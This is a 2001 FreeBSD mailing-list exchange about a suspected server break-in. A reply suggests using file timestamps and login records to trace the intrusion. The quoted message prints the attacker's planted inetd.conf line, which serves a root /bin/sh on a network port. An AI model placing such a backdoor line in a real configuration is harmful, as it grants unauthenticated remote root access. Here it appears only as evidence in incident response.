Re: I got hacked, I think

From: jslivko@4evermail.com
Date: 10/18/01


From: jslivko@4evermail.com <jslivko@4evermail.com>
To: <tomek@mpionline.com>
Date: Thu, 18 Oct 2001 16:31:37 +0000


[CC'd to -security, as this should be discussed there]

Did you have any system snoopers around that you installed (tripwire
and things of that ilk) that you can refer to for time information?
If you can narrow down the time that the files were updated, you
might have found out when the intrusion actually occurred and then,
by grepping that information from "last", you can find out who he
logged in as (assuming he logged in normally the first time). If I
can be of any help, feel free to shoot me an e-mail. -- Jonathan

--- "Tomek" <tomek@mpionline.com> wrote:
> I found out more info.
>
> -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-
1.6.3.7_1.tgz
> -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
>
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream tcp nowait root /bin/sh sh -i
>
> I take it that "sh" would not even request a login or anything if
called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... who did he even login in the first time, maybe it was some
> buffer overflow or something.... yuck.
>
> TY for all your help guys, you are all wonderful! I will leave you
in
> peace now (I hope). I still dont know about Broot though...
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message